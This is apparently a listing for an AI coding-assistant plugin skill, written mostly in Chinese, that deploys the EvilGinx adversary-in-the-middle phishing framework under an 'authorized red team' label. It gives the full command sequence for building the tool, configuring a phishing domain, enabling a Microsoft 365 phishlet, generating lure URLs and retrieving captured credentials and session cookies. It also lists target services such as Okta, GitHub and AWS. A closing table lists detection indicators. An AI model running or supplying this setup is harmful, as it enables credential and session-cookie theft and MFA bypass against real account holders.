Deploys EvilGinx3 for authorized red team initial access via AiTM phishing, capturing session tokens and cookies to bypass MFA and hijack sessions.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
EvilGinx3 是一个中间人(Man-in-the-Middle)攻击框架,用于钓鱼登录凭据和会话 Cookie,从而绕过多因素认证(MFA)。与仅捕获用户名和密码的传统凭据钓鱼不同,EvilGinx3 作为透明反向代理运行于受害者和合法认证服务之间,拦截包括 MFA 令牌和会话 Cookie 在内的完整认证流程。这使其成为红队演示对手中间人(AiTM)攻击风险的主要工具,特别针对仅依赖 MFA 进行保护的组织。
Deploys EvilGinx3 for red team phishing to capture session cookies, bypass MFA, and hijack sessions via adversary-in-the-middle attacks.
Deploys EvilGinx3 for adversary-in-the-middle phishing to capture session tokens, bypass MFA, and gain initial access in authorized red team engagements.
Detects and responds to Adversary-in-the-Middle (AiTM) phishing attacks using EvilProxy, Evilginx, Tycoon 2FA to bypass MFA and steal session tokens. Guides SIEM rules, Azure AD policies, and proxy monitoring.
Share bugs, ideas, or general feedback.
EvilGinx3 是一个中间人(Man-in-the-Middle)攻击框架,用于钓鱼登录凭据和会话 Cookie,从而绕过多因素认证(MFA)。与仅捕获用户名和密码的传统凭据钓鱼不同,EvilGinx3 作为透明反向代理运行于受害者和合法认证服务之间,拦截包括 MFA 令牌和会话 Cookie 在内的完整认证流程。这使其成为红队演示对手中间人(AiTM)攻击风险的主要工具,特别针对仅依赖 MFA 进行保护的组织。
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo ./bin/evilginx -p ./phishlets
config domain example-phish.com
config ipv4 <server-ip>
phishlets hostname o365 login.example-phish.com
phishlets enable o365
phishlets
lures create o365
lures get-url 0
lures edit 0 redirect_url https://legitimate-site.com
# 与 EvilGoPhish 集成以执行联合活动
# 提供 GoPhish 邮件跟踪 + EvilGinx3 凭据捕获
sessions
sessions <session-id>
# 会话输出包括:
# - 用户名和密码
# - 会话 Cookie(认证令牌)
# - 自定义捕获的参数
| 工具 | 用途 | 平台 |
|---|---|---|
| EvilGinx3 | AiTM 钓鱼框架 | Linux |
| GoPhish | 钓鱼活动管理 | 跨平台 |
| EvilGoPhish | 集成 EvilGinx3 + GoPhish | Linux |
| Cookie-Editor | 浏览器 Cookie 导入/导出 | 浏览器扩展 |
| Modlishka | 替代 AiTM 代理框架 | Linux |
| Muraena | 替代 AiTM 钓鱼代理 | Linux |
| 目标服务 | Phishlet | 捕获数据 |
|---|---|---|
| Microsoft 365 | o365 | 会话 Cookie、凭据 |
| Google Workspace | 会话 Cookie、凭据 | |
| Okta | okta | 会话令牌、凭据 |
| GitHub | github | 会话 Cookie、凭据 |
| AWS 控制台 | aws | 会话令牌、凭据 |
| 指标 | 检测方法 |
|---|---|
| 新注册的仿冒域名 | 域名监控和证书透明度日志 |
| 可疑域名的 SSL 证书 | CT 日志监控(crt.sh、Censys) |
| 钓鱼后的异常登录位置 | 认证事件的 SIEM 关联 |
| 来自不同 IP 的会话 Cookie 重放 | 条件访问策略告警 |
| 流量中的 AiTM 代理头部 | 针对代理工件的网络检查 |